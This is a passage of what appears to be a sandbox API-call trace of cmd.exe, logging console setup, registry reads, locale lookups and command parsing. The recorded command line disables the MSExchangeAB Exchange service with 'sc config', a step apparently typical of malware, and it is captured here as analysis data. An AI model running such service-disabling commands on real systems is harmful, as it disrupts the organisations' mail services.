_Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0129.255] GetCurrentThreadId () returned 0xeb8 [0129.255] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb8) returned 0x84 [0129.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.255] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0129.255] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.257] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x49ffc1c | out: phkResult=0x49ffc1c*=0x0) returned 0x2 [0129.258] VirtualQuery (in: lpAddress=0x49ffc23, lpBuffer=0x49ffbd4, dwLength=0x1c | out: lpBuffer=0x49ffbd4*(BaseAddress=0x49ff000, AllocationBase=0x4900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.258] VirtualQuery (in: lpAddress=0x4900000, lpBuffer=0x49ffbd4, dwLength=0x1c | out: lpBuffer=0x49ffbd4*(BaseAddress=0x4900000, AllocationBase=0x4900000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.258] VirtualQuery (in: lpAddress=0x4901000, lpBuffer=0x49ffbd4, dwLength=0x1c | out: lpBuffer=0x49ffbd4*(BaseAddress=0x4901000, AllocationBase=0x4900000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.258] VirtualQuery (in: lpAddress=0x4903000, lpBuffer=0x49ffbd4, dwLength=0x1c | out: lpBuffer=0x49ffbd4*(BaseAddress=0x4903000, AllocationBase=0x4900000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.258] VirtualQuery (in: lpAddress=0x4a00000, lpBuffer=0x49ffbd4, dwLength=0x1c | out: lpBuffer=0x49ffbd4*(BaseAddress=0x4a00000, AllocationBase=0x4a00000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0129.258] GetConsoleOutputCP () returned 0x1b5 [0129.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.258] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0129.258] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.258] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0129.258] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.258] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0129.258] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.258] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0129.259] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.259] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0129.259] _get_osfhandle (_FileHandle=0) returned 0x38 [0129.259] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0129.259] GetEnvironmentStringsW () returned 0x4d57d90* [0129.300] FreeEnvironmentStringsA (penv="A") returned 1 [0129.301] GetEnvironmentStringsW () returned 0x4d57d90* [0129.301] FreeEnvironmentStringsA (penv="A") returned 1 [0129.301] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49feb80 | out: phkResult=0x49feb80*=0x94) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0xc8, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x1, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0x1, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x0, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x40, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x40, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0x40, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegCloseKey (hKey=0x94) returned 0x0 [0129.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x49feb80 | out: phkResult=0x49feb80*=0x94) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0x40, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x1, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0x1, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x0, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x9, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x4, lpData=0x49feb8c*=0x9, lpcbData=0x49feb88*=0x4) returned 0x0 [0129.301] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x49feb84, lpData=0x49feb8c, lpcbData=0x49feb88*=0x1000 | out: lpType=0x49feb84*=0x0, lpData=0x49feb8c*=0x9, lpcbData=0x49feb88*=0x1000) returned 0x2 [0129.301] RegCloseKey (hKey=0x94) returned 0x0 [0129.301] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29832 [0129.301] srand (_Seed=0x5ad29832) [0129.301] GetCommandLineW () returned="/c sc config MSExchangeAB start= disabled" [0129.301] GetCommandLineW () returned="/c sc config MSExchangeAB start= disabled" [0129.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.302] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d59ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0129.302] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.302] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.302] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.302] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.302] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.302] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.302] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.302] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.302] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.302] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.302] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.302] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.302] GetEnvironmentStringsW () returned 0x4d57d90* [0129.302] FreeEnvironmentStringsA (penv="A") returned 1 [0129.302] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.302] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.302] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.302] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.302] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.302] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.302] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.302] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.302] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.302] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.302] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff958 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.302] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x49ff958, lpFilePart=0x49ff950 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x49ff950*="Desktop") returned 0x1d [0129.302] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.303] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x49ff6d8 | out: lpFindFileData=0x49ff6d8) returned 0x4d505c8 [0129.303] FindClose (in: hFindFile=0x4d505c8 | out: hFindFile=0x4d505c8) returned 1 [0129.303] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x49ff6d8 | out: lpFindFileData=0x49ff6d8) returned 0x4d505c8 [0129.303] FindClose (in: hFindFile=0x4d505c8 | out: hFindFile=0x4d505c8) returned 1 [0129.303] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0129.303] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x49ff6d8 | out: lpFindFileData=0x49ff6d8) returned 0x4d505c8 [0129.303] FindClose (in: hFindFile=0x4d505c8 | out: hFindFile=0x4d505c8) returned 1 [0129.303] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0129.303] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0129.303] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0129.303] GetEnvironmentStringsW () returned 0x4d57d90* [0129.303] FreeEnvironmentStringsA (penv="=") returned 1 [0129.303] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0129.304] GetConsoleOutputCP () returned 0x1b5 [0129.304] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0129.304] GetUserDefaultLCID () returned 0x409 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x49ffa88, cchData=128 | out: lpLCData="0") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x49ffa88, cchData=128 | out: lpLCData="0") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x49ffa88, cchData=128 | out: lpLCData="1") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0129.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0129.304] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.305] GetConsoleTitleW (in: lpConsoleTitle=0x4d5aa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.305] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0129.305] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0129.305] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0129.305] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0129.306] _wcsicmp (_String1="sc", _String2=")") returned 74 [0129.306] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0129.306] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0129.306] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0129.306] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0129.306] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0129.306] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0129.307] GetConsoleTitleW (in: lpConsoleTitle=0x49ff770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.308] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.308] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.308] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.308] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.308] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.308] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.308] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.308] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.308] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.308] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.308] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.308] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.308] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.308] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.308] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.308] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.308] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.308] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.308] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.308] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.308] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.308] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.308] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.308] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.308] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.308] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.308] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.308] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.308] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.308] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.308] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.308] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.308] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.308] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0129.308] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0129.308] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0129.308] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0129.309] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0129.309] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0129.309] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0129.309] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0129.309] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0129.309] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0129.309] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0129.309] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0129.309] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0129.309] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0129.309] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0129.309] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0129.309] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0129.309] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0129.309] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0129.309] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0129.309] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0129.309] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0129.309] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0129.309] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0129.309] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0129.309] _wcsicmp (_String1="sc", _String2="START") returned -17 [0129.309] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0129.309] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0129.309] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0129.309] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0129.309] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0129.309] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0129.309] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0129.309] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0129.309] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0129.309] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0129.309] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0129.309] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0129.309] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0129.309] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0129.309] SetErrorMode (uMode=0x0) returned 0x0 [0129.310] SetErrorMode (uMode=0x1) returned 0x0 [0129.310] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d505d0, lpFilePart=0x49ff27c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x49ff27c*="Desktop") returned 0x1d [0129.310] SetErrorMode (uMode=0x0) returned 0x1 [0129.310] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0129.310] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.317] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.317] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.317] GetConsoleTitleW (in: lpConsoleTitle=0x49ff4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.317] InitializeProcThreadAttributeList (in: lpAttributeList=0x49ff428, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x49ff40c | out: lpAttributeList=0x49ff428, lpSize=0x49ff40c) returned 1 [0129.317] UpdateProcThreadAttribute (in: lpAttributeList=0x49ff428, dwFlags=0x0, Attribute=0x60001, lpValue=0x49ff414, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x49ff428, lpPreviousValue=0x0) returned 1 [0129.317] GetStartupInfoW (in: lpStartupInfo=0x49ff460 | out: lpStartupInfo=0x49ff460*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0129.317] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0129.318] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0129.318] 